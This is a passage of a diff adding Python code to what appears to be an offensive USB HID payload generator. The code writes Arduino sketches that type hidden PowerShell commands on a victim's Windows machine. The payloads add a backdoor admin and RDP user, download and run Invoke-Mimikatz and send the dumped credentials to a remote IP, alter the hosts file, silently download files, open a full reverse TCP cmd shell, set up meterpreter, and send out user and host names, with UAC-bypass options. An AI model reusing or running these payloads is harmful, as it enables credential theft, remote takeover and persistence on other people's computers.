Keyboard.println(\"net user " + userName + " " + userPass + " /add \");\n" + payload += " pressEnter();\n" + payload += " delay(100);\n" + payload += " Keyboard.println(\"net localgroup administrators " + userName + " /add\");\n" + payload += " pressEnter();\n" + payload += " Keyboard.println(\"net localgroup \\\"remote desktop users\\\" " + userName + " /add\");\n" + payload += " pressEnter();\n" + if bypassUACoption == "run As (visible popup)": + payload += " Keyboard.println(\"exit\");\n" + payload += " delay(100);\n" + payload += " pressEnter();\n" + payload += " Keyboard.println(\"exit\");\n" + payload += " delay(100);\n" + payload += " pressEnter();\n" + else: + payload += " Keyboard.println(\"exit\");\n" + payload += " delay(100);\n" + payload += " pressEnter();\n" + payload += "}\n" + + payloadFunc = "addUser();\n" + + WinWriteFile(fileName,payloadFunc,bypassUAC,payload,bubble) + +def WinOption6(): + + done = False + looper = False + mimiURL="" + remoteIP="" + remotePort="" + fileName="" + bypassUACoption="" + bubbleSetting="" + + while looper != True: + + coreUtils.clearScreen() + print "********************************************************************************************" + print "* *" + print "* Download & Run Invoke-Mimikatz.ps1 *" + print "* This payload will download & run Invoke-Mimikatz.ps1 then send output to remote server *" + print "* Options are: 1. The mimikatz URL 2. remote IP 3. Listening Port *" + print "* 4. How to bypass UAC 5. The output File name *" + print "* *" + print "********************************************************************************************" + print "\n" + + menu = {} + menu['0'] = "Info" + menu['1'] = "Set the URL Invoke-Mimikatz.ps1 is located" + menu['2'] = "Set the IP of the remote server" + menu['3'] = "Set the listening port of the remote server" + menu['4'] = "Set bypassUAC mode" + menu['5'] = "Set Arduino sketch filename" + menu['6'] = "Set notification bubble option" + menu['7'] = "Write Arduino sketch" + menu['42']= "Return to previous menu" + menu['99']= "Exit" + + options=menu.keys() + options.sort(key=int) + for entry in options: + print entry, menu[entry] + + print "\n\n" + if mimiURL != "": + print "URL of Invoke-Mimikatz.ps1 set to -> " + mimiURL + if remoteIP != "": + print "The IP of the remote server is set to -> " + remoteIP + if remotePort != "": + print "The listening port of the remote server is set to -> " + remotePort + if bypassUACoption != "": + print "bypassUAC technique set to -> " + bypassUACoption + if bubbleSetting != "": + print "Notification bubble set to -> " + bubbleSetting + if fileName != "": + print "Arduino filename set to -> " + fileName + + selection=raw_input("\nPlease Select: ") + + if selection =='1': + mimiURL = raw_input("Please enter the full URL where Invoke-Mimikatz.ps1 is located (Please include \"http://\" or \"https://\")\nIf left blank, the default https://goo.gl/KBCGCr will be used: ") + if mimiURL == "": + mimiURL = 'https://goo.gl/KBCGCr' + elif selection == '2': + remoteIP = raw_input("Please enter the IP of the server to send the Mimikatz to: ") + elif selection == '3': + remotePort = raw_input("Please enter the port the server will be listening on: ") + elif selection == '4': + bypassUACoption,bypassUAC = checkUACBypass() + elif selection == '5': + fileName = coreUtils.getFileName('remoteMimiKatz.ino') + elif selection == '6': + bubble, bubbleSetting = notificationBubble() + elif selection == '7': + if done == False: + print "\nYou have not set all the options" + raw_input("Press Enter to return to the menu and set all the options") + else: + looper = True + elif selection == '42': + coreUtils.clearScreen() + break + elif selection == '99': + exit() + elif selection == '0': + nfoCore.Win6info() + else: + print "\n\n***That is not a valid option!***\n\n" + + if mimiURL != "" and remoteIP != "" and remotePort != "" and fileName != "" and bypassUACoption != "" and bubbleSetting != "": + done = True + + if done == True and looper == True: + payload = "void invokeMimiKatz(){\n" + if bypassUACoption == "https://goo.gl/fPl4tm (no visible popup)": + payload += " Keyboard.print(\"IEX (New-Object Net.WebClient).DownloadString(\'" + mimiURL + "\'); $port=" + remotePort +"; $remoteHost=\'"+ remoteIP + else: + payload += " Keyboard.print(\"powershell -w Hidden \\\"IEX (New-Object Net.WebClient).DownloadString(\'" + mimiURL + "\'); $port=" + remotePort +"; $remoteHost=\'"+ remoteIP + payload += "\'; $Message = Invoke-Mimikatz -DumpCreds; $socket = new-object System.Net.Sockets.TcpClient($remoteHost, $port); $data = [System.Text.Encoding]::ASCII.GetBytes($Message);" + if bypassUACoption == "https://goo.gl/fPl4tm (no visible popup)": + payload += " $stream = $socket.GetStream(); $stream.Write($data,0,$data.Length);exit;\");\n" + else: + payload += " $stream = $socket.GetStream(); $stream.Write($data,0,$data.Length);exit;\\\"\");\n" + payload += " pressEnter();\n" + if bypassUACoption == "run As (visible popup)": + payload += " Keyboard.println(\"exit\");\n" + payload += " delay(100);\n" + payload += " pressEnter();\n" + payload += " Keyboard.println(\"exit\");\n" + payload += " delay(100);\n" + payload += " pressEnter();\n" + elif bypassUACoption == "None": + payload += " Keyboard.println(\"exit\");\n" + payload += " delay(100);\n" + payload += " pressEnter();\n" + payload += "}\n" + + payloadFunc = "invokeMimiKatz();\n" + + WinWriteFile(fileName,payloadFunc,bypassUAC,payload,bubble) + +def WinOption7(): + + done = False + looper = False + DNS="" + remoteIP="" + fileName="" + bypassUACoption="" + bubbleSetting="" + + while looper != True: + + coreUtils.clearScreen() + print "********************************************************************************************" + print "* *" + print "* Change DNS Entry in Hostfile *" + print "* This payload will modify the hostfile to include specific Domain/IP entry *" + print "* Options are: 1. Domain Name 2. IP Address 3. How to bypass UAC 5. The output File name *" + print "* *" + print "********************************************************************************************" + print "\n" + + menu = {} + menu['0'] = "Info" + menu['1'] = "Set the name of the DNS entry" + menu['2'] = "Set the IP of the DNS entry" + menu['3'] = "Set bypassUAC mode" + menu['4'] = "Set Arduino sketch filename" + menu['5'] = "Set notification bubble option" + menu['6'] = "Write Arduino sketch" + menu['42']= "Return to previous menu" + menu['99']= "Exit" + + options=menu.keys() + options.sort(key=int) + for entry in options: + print entry, menu[entry] + + print "\n\n" + if DNS != "": + print "The DNS entry is set to -> " + DNS + if remoteIP != "": + print "The IP of DNS entry is set to -> " + remoteIP + if bypassUACoption != "": + print "bypassUAC technique set to -> " + bypassUACoption + if bubbleSetting != "": + print "Notification bubble set to -> " + bubbleSetting + if fileName != "": + print "Arduino filename set to -> " + fileName + + selection=raw_input("\nPlease Select: ") + + if selection =='1': + DNS = raw_input("Please enter the DNS name of the entry you wish to add: ") + elif selection == '2': + remoteIP = raw_input("Please enter the IP address of the entry you wish to add: ") + elif selection == '3': + bypassUACoption,bypassUAC = checkUACBypass() + elif selection == '4': + fileName = coreUtils.getFileName('changeDNS.ino') + elif selection == '5': + bubble, bubbleSetting = notificationBubble() + elif selection == '6': + if done == False: + print "\nYou have not set all the options" + raw_input("Press Enter to return to the menu and set all the options") + else: + looper = True + elif selection == '42': + coreUtils.clearScreen() + break + elif selection == '99': + exit() + elif selection == '0': + nfoCore.Win7info() + else: + print "\n\n***That is not a valid option!***\n\n" + + if DNS != "" and remoteIP != "" and fileName != "" and bypassUACoption != "" and bubbleSetting != "": + done = True + + if done == True and looper == True: + + payload = "void addDNS(){\n" + payload += " Keyboard.println(\"powershell -w hidden \\\"ac -Path 'C:\\\\WINDOWS\\\\system32\\\\drivers\\\\etc\\\\hosts' -Value '" + remoteIP + " " + DNS + "';\\\"\");\n" + payload += " pressEnter();\n" + if bypassUACoption == "run As (visible popup)": + payload += " Keyboard.println(\"exit\");\n" + payload += " delay(100);\n" + payload += " pressEnter();\n" + payload += " Keyboard.println(\"exit\");\n" + payload += " delay(100);\n" + payload += " pressEnter();\n" + elif bypassUACoption == "None": + payload += " Keyboard.println(\"exit\");\n" + payload += " delay(100);\n" + payload += " pressEnter();\n" + payload += "}\n" + + payloadFunc = "addDNS();\n" + + WinWriteFile(fileName,payloadFunc,bypassUAC,payload,bubble) + +def WinOption8(): + + done = False + looper = False + URL="" + dropFile="" + fileName="" + bypassUACoption="" + bubbleSetting="" + + while looper != True: + + coreUtils.clearScreen() + print "********************************************************************************************" + print "* *" + print "* Download File to Desktop *" + print "* This payload will download a file and copy it to the user's desktop *" + print "* Options are: 1. Full URL to file to download 2. File Name *" + print "* *" + print "********************************************************************************************" + print "\n" + + menu = {} + menu['0'] = "Info" + menu['1'] = "Set URL of the file to download to the Desktop" + menu['2'] = "Set bypassUAC mode" + menu['3'] = "Set Arduino sketch filename" + menu['4'] = "Set notification bubble option" + menu['5'] = "Write Arduino sketch" + menu['42']= "Return to previous menu" + menu['99']= "Exit" + + options=menu.keys() + options.sort(key=int) + for entry in options: + print entry, menu[entry] + + print "\n\n" + if URL != "": + print "Full URL to file set to -> " + URL + if dropFile !="": + print "Name of file being dropped onto Desktop -> " + dropFile + if bypassUACoption != "": + print "bypassUAC technique set to -> " + bypassUACoption + if bubbleSetting != "": + print "Notification bubble set to -> " + bubbleSetting + if fileName != "": + print "Arduino filename set to -> " + fileName + + selection=raw_input("\nPlease Select: ") + + if selection =='1': + URL = raw_input("Please enter the full URL of the file (please include \"http://\" or \"https://\"): ") + dropFile = coreUtils.getBinary(URL) + elif selection == '2': + bypassUACoption,bypassUAC = checkUACBypass() + elif selection == '3': + fileName = coreUtils.getFileName('desktopFile.ino') + elif selection == '4': + bubble, bubbleSetting = notificationBubble() + elif selection == '5': + if done == False: + print "\nYou have not set all the options" + raw_input("Press Enter to return to the menu and set all the options") + else: + looper = True + elif selection == '42': + coreUtils.clearScreen() + break + elif selection == '99': + exit() + elif selection == '0': + nfoCore.Win8info() + else: + print "\n\n***That is not a valid option!***\n\n" + + if URL != "" and fileName != "" and bypassUACoption != "" and bubbleSetting != "": + done = True + + if done == True and looper == True: + payload = "void Download(){\n" + payload += " Keyboard.println(\"powershell -w hidden \\\"$url = '"+URL+ "';$output = 'C:\\\\users\\\\'+$env:Username+'\\\\Desktop\\\\"+dropFile+"';Invoke-Webrequest -Uri $url -OutFile $output;exit;\\\"\");\n" + payload += " pressEnter();\n" + if bypassUACoption == "run As (visible popup)": + payload += " Keyboard.println(\"exit\");\n" + payload += " delay(100);\n" + payload += " pressEnter();\n" + payload += " Keyboard.println(\"exit\");\n" + payload += " delay(100);\n" + payload += " pressEnter();\n" + elif bypassUACoption == "None": + payload += " Keyboard.println(\"exit\");\n" + payload += " delay(100);\n" + payload += " pressEnter();\n" + payload += "}\n" + + payloadFunc = "Download();\n" + + WinWriteFile(fileName,payloadFunc,bypassUAC, payload,bubble) + +def WinOption9(): + + done = False + looper = False + remoteIP="" + remotePort="" + fileName="" + bypassUACoption="" + bubbleSetting="" + + while looper != True: + + coreUtils.clearScreen() + print "********************************************************************************************" + print "* *" + print "* Reverse TCP CMD Prompt *" + print "* This payload will create a Reverse TCP CMD Prompt *" + print "* Options are: 1. IP Address 2. Listening Port 3. The output File name *" + print "* *" + print "********************************************************************************************" + print "\n" + + menu = {} + menu['0'] = "Info" + menu['1'] = "Set IP address of the remote server" + menu['2'] = "Set the listening port of the remote server" + menu['3'] = "Set bypassUAC mode" + menu['4'] = "Set Arduino sketch filename" + menu['5'] = "Set notification bubble option" + menu['6'] = "Write Arduino sketch" + menu['42']= "Return to previous menu" + menu['99']= "Exit" + + options=menu.keys() + options.sort(key=int) + for entry in options: + print entry, menu[entry] + + print "\n\n" + if remoteIP != "": + print "IP of the remote server set to -> " + remoteIP + if remotePort != "": + print "Listening port on the remote server set to -> " + remotePort + if bypassUACoption != "": + print "bypassUAC technique set to -> " + bypassUACoption + if bubbleSetting != "": + print "Notification bubble set to -> " + bubbleSetting + if fileName != "": + print "Arduino filename set to -> " + fileName + + selection=raw_input("\nPlease Select: ") + + if selection =='1': + remoteIP = raw_input("Please enter the IP address of the remote server to connect to: ") + elif selection == '2': + remotePort = raw_input("Please enter the listening port on the remote server:") + elif selection == '3': + bypassUACoption,bypassUAC = checkUACBypass() + elif selection == '4': + fileName = coreUtils.getFileName('reverseCMD.ino') + elif selection == '5': + bubble, bubbleSetting = notificationBubble() + elif selection == '6': + if done == False: + print "\nYou have not set all the options" + raw_input("Press Enter to return to the menu and set all the options") + else: + looper = True + elif selection == '42': + coreUtils.clearScreen() + break + elif selection == '99': + exit() + elif selection == '0': + nfoCore.Win9info() + else: + print "\n\n***That is not a valid option!***\n\n" + + if remoteIP != "" and remotePort != "" and fileName != "" and bypassUACoption != "" and bubbleSetting != "": + done = True + + if done == True and looper == True: + payload = "void reverseCMD(){\n" + if bypassUACoption == "https://goo.gl/fPl4tm (no visible popup)": + payload +="Keyboard.println(\"RSC{if ($c.Connected -eq $true) {$c.Close()};if ($p.ExitCode -ne $null) {$p.Close()};" + else: + payload +="Keyboard.println(\"powershell -w hidden -nop -c function \\\"RSC{if ($c.Connected -eq $true) {$c.Close()};if ($p.ExitCode -ne $null) {$p.Close()};" + payload +="exit;};$a='"+remoteIP+"';$p='"+remotePort+"';$c=New-Object system.net.sockets.tcpclient;$c.connect($a,$p);$s=$c.GetStream();" + payload +="$nb=New-Object System.Byte[] $c.ReceiveBufferSize;$p=New-Object System.Diagnostics.Process;$p.StartInfo.FileName='cmd.exe';" + payload +="$p.StartInfo.RedirectStandardInput=1;$p.StartInfo.RedirectStandardOutput=1;$p.StartInfo.UseShellExecute=0;$p.Start();$is=$p.StandardInput;" + payload +="$os=$p.StandardOutput;Start-Sleep 1;$e=new-object System.Text.AsciiEncoding;while($os.Peek() -ne -1){$o += $e.GetString($os.Read())};" + payload +="$s.Write($e.GetBytes($o),0,$o.Length);$o=$null;$d=$false;$t=0;while (-not $d) {if ($c.Connected -ne $true) {RSC};$pos=0;$i=1;" + payload +=" while (($i -gt 0) -and ($pos -lt $nb.Length)) {$r=$s.Read($nb,$pos,$nb.Length - $pos);$pos+=$r;if (-not $pos -or $pos -eq 0) {RSC};" + payload +="if ($nb[0..$($pos-1)] -contains 10) {break}};if ($pos -gt 0){$str=$e.GetString($nb,0,$pos);$is.write($str);start-sleep 1;" + payload +="if ($p.ExitCode -ne $null){RSC}else{$o=$e.GetString($os.Read());while($os.Peek() -ne -1){$o += $e.GetString($os.Read());" + if bypassUACoption == "https://goo.gl/fPl4tm (no visible popup)": + payload +="if ($o -eq $str) {$o=''}};$s.Write($e.GetBytes($o),0,$o.length);$o=$null;$str=$null}}else{RSC}};\");\n" + else: + payload +="if ($o -eq $str) {$o=''}};$s.Write($e.GetBytes($o),0,$o.length);$o=$null;$str=$null}}else{RSC}};\\\"\");\n" + payload +="pressEnter();\n" + if bypassUACoption == "run As (visible popup)": + payload += " Keyboard.println(\"exit\");\n" + payload += " delay(100);\n" + payload += " pressEnter();\n" + payload += " Keyboard.println(\"exit\");\n" + payload += " delay(100);\n" + payload += " pressEnter();\n" + elif bypassUACoption == "None": + payload += " Keyboard.println(\"exit\");\n" + payload += " delay(100);\n" + payload += " pressEnter();\n" + payload += "}\n" + + payloadFunc = "reverseCMD();\n" + + WinWriteFile(fileName,payloadFunc,bypassUAC, payload,bubble) + +def WinOption10(): + + done = False + looper = False + remoteIP= "" + remotePort= "" + fileName="" + RCfile="" + bypassUACoption="" + bubbleSetting="" + + while looper != True: + + coreUtils.clearScreen() + print "********************************************************************************************" + print "* *" + print "* windows/meterpreter/reverse_https *" + print "* This payload will create a Reverse HTTPS meterpreter session *" + print "* Options are: 1. IP Address 2. Listening Port 3. The output File name *" + print "* *" + print "********************************************************************************************" + print "\n" + + menu = {} + menu['0'] = "Info" + menu['1'] = "Set IP address of the remote server" + menu['2'] = "Set the listening port of the remote server" + menu['3'] = "Set the filename of the Metasploit RC File" + menu['4'] = "Set bypassUAC mode" + menu['5'] = "Set Arduino sketch filename" + menu['6'] = "Set notification bubble option" + menu['7'] = "Write Arduino sketch" + menu['42']= "Return to previous menu" + menu['99']= "Exit" + + options=menu.keys() + options.sort(key=int) + for entry in options: + print entry, menu[entry] + + print "\n\n" + if remoteIP != "": + print "IP of the remote server set to -> " + remoteIP + if remotePort != "": + print "Listening port on the remote server set to -> " + remotePort + if RCfile != "": + print "Metasploit RC File name set to -> " + RCfile + if bypassUACoption != "": + print "bypassUAC technique set to -> " + bypassUACoption + if bubbleSetting != "": + print "Notification bubble set to -> " + bubbleSetting + if fileName != "": + print "Arduino filename set to -> " + fileName + + selection=raw_input("\nPlease Select: ") + + if selection =='1': + remoteIP = raw_input("Please enter the IP address of the remote server to connect to: ") + elif selection == '2': + remotePort = raw_input("Please enter the listening port on the remote server:") + elif selection == '3': + RCfile = coreUtils.getRCFileName('revMetPSH.rc') + elif selection == '4': + bypassUACoption,bypassUAC = checkUACBypass() + elif selection == '5': + fileName = coreUtils.getFileName('revMetPSH.ino') + elif selection == '6': + bubble, bubbleSetting = notificationBubble() + elif selection == '7': + if done == False: + print "\nYou have not set all the options" + raw_input("Press Enter to return to the menu and set all the options") + else: + looper = True + elif selection == '42': + coreUtils.clearScreen() + break + elif selection == '99': + exit() + elif selection == '0': + nfoCore.Win10info() + else: + print "\n\n***That is not a valid option!***\n\n" + + if remoteIP != "" and remotePort != "" and fileName != "" and RCfile != "" and bypassUACoption != "" and bubbleSetting != "": + done = True + + if done == True and looper == True: + + payload = "void reversePSH(){\n" + payload += " Keyboard.println(\"powershell -w hidden -nop -c function RSC{if ($c.Connected -eq $true) {$c.Close()};" + payload += "if ($p.ExitCode -ne $null) {$p.Close()};exit;};$a='"+remoteIP+"';$p='"+remotePort+"';$c=New-Object system.net.sockets.tcpclient;" + payload += "$c.connect($a,$p);$s=$c.GetStream();$nb=New-Object System.Byte[] $c.ReceiveBufferSize;$p=New-Object System.Diagnostics.Process;" + payload += "$p.StartInfo.FileName='cmd.exe';$p.StartInfo.RedirectStandardInput=1;$p.StartInfo.RedirectStandardOutput=1;$p.StartInfo.UseShellExecute=0;" + payload += "$p.Start();$is=$p.StandardInput;$os=$p.StandardOutput;Start-Sleep 1;$e=new-object System.Text.AsciiEncoding;while($os.Peek() -ne -1){$o += $e.GetString($os.Read())};" + payload += "$s.Write($e.GetBytes($o),0,$o.Length);$o=$null;$d=$false;$t=0;while (-not $d) {if ($c.Connected -ne $true) {RSC};$pos=0;$i=1; " + payload += "while (($i -gt 0) -and ($pos -lt $nb.Length)) {$r=$s.Read($nb,$pos,$nb.Length - $pos);$pos+=$r;if (-not $pos -or $pos -eq 0) {RSC};if ($nb[0..$($pos-1)] -contains 10) {break}};" + payload += "if ($pos -gt 0){$str=$e.GetString($nb,0,$pos);$is.write($str);start-sleep 1;if ($p.ExitCode -ne $null){RSC}else{$o=$e.GetString($os.Read());" + payload += "while($os.Peek() -ne -1){$o += $e.GetString($os.Read());if ($o -eq $str) {$o=''}};$s.Write($e.GetBytes($o),0,$o.length);$o=$null;$str=$null}}else{RSC}};\");\n" + payload += " pressEnter();\n" + if bypassUACoption == "run As (visible popup)": + payload += " Keyboard.println(\"exit\");\n" + payload += " delay(100);\n" + payload += " pressEnter();\n" + payload += " Keyboard.println(\"exit\");\n" + payload += " delay(100);\n" + payload += " pressEnter();\n" + elif bypassUACoption == "None": + payload += " Keyboard.println(\"exit\");\n" + payload += " delay(100);\n" + payload += " pressEnter();\n" + payload += "}\n" + + payloadFunc = "reversePSH();\n" + + coreUtils.msfRCfile(remoteIP,remotePort,'windows/meterpreter/reverse_https',RCfile) + WinWriteFile(fileName,payloadFunc,bypassUAC, payload,bubble) + + +def WinOption11(): + + done = False + looper = False + remoteIP="" + remotePort="" + fileName="" + bypassUACoption="" + bubbleSetting="" + + while looper != True: + + coreUtils.clearScreen() + print "********************************************************************************************" + print "* *" + print "* UserName and Computer Name *" + print "* This payload will grab the UserName and Computer Name of the who plugged in the device *" + print "* Options are: 1. remote IP 2. Listening Port *" + print "* *" + print "* *" + print "********************************************************************************************" + print "\n" + + menu = {} + menu['0'] = "Info" + menu['1'] = "Set the IP of the remote server" + menu['2'] = "Set the listening port of the remote server" + menu['3'] = "Set bypassUAC mode" + menu['4'] = "Set Arduino sketch filename" + menu['5'] = "Set notification bubble option" + menu['6'] = "Write Arduino sketch" + menu['42']= "Return to previous menu" + menu['99']= "Exit" + + options=menu.keys() + options.sort(key=int) + for entry in options: + print entry, menu[entry] + + print "\n\n" + if remoteIP != "": + print "The IP of the remote server is set to -> " + remoteIP + if remotePort != "": + print "The listening port of the remote server is set to -> " + remotePort + if bypassUACoption != "": + print "bypassUAC technique set to -> " + bypassUACoption + if bubbleSetting != "": + print "Notification bubble set to -> " + bubbleSetting + if fileName != "": + print "Arduino filename set to -> " + fileName + + selection=raw_input("\nPlease Select: ") + + if selection == '1': + remoteIP = raw_input("Please enter the IP of the server to send the data to: ") + elif selection == '2': + remotePort = raw_input("Please enter the port the server will be listening on: ") + elif selection == '3': + bypassUACoption,bypassUAC = checkUACBypass() + elif selection == '4': + fileName = coreUtils.getFileName('userAndComputer.ino') + elif selection == '5': + bubble, bubbleSetting = notificationBubble() + elif selection == '6': + if done == False: + print "\nYou have not set all the options" + raw_input("Press Enter to return to the menu and set all the options") + else: + looper = True + elif selection == '42': + coreUtils.clearScreen() + break + elif selection == '99': + exit() + elif selection == '0': + nfoCore.Win11info() + else: + print "\n\n***That is not a valid option!***\n\n" + + if remoteIP != "" and remotePort != "" and fileName != "" and bypassUACoption != "" and bubbleSetting != "": + done = True + + if done == True and looper == True: + payload = "void userAndComputer(){\n" + if bypassUACoption == "https://goo.gl/fPl4tm (no visible popup)": + payload += " Keyboard.print(\"$pc = $env:computername;$user = $env:UserName; $Message = $pc + ' ' + $user; $port=" + remotePort +"; $remoteHost=\'"+ remoteIP + else: + payload += " Keyboard.print(\"powershell -w Hidden \\\"$pc = $env:computername;$user = $env:UserName; $Message = $pc + ' ' + $user; $port=" + remotePort +"; $remoteHost=\'"+ remoteIP + payload += "\'; $socket = new-object System.Net.Sockets.TcpClient($remoteHost, $port); $data = [System.Text.Encoding]::ASCII.GetBytes($Message);" + if bypassUACoption == "https://goo.gl/fPl4tm (no visible popup)": + payload += " $stream = $socket.GetStream(); $stream.Write($data,0,$data.Length);exit;\");\n" + else: + payload += " $stream = $socket.GetStream(); $stream.Write($data,0,$data.Length);exit;\\\"\");\n" + payload += " pressEnter();\n" + if bypassUACoption == "run As (visible popup)": + payload += " Keyboard.println(\"exit\");\n" + payload += " delay(100);\n" + payload += " pressEnter();\n" + payload += " Keyboard.println(\"exit\");\n" + payload += " delay(100);\n" + payload += " pressEnter();\n" + elif bypassUACoption == "None": + payload += " Keyboard.println(\"exit\");\n" + payload += " delay(100);\n" + payload += " pressEnter();\n" + payload += "}\n" + + payloadFunc = "userAndComputer();\n" + + WinWriteFile(fileName,payloadFunc,bypassUAC,payload,bubble)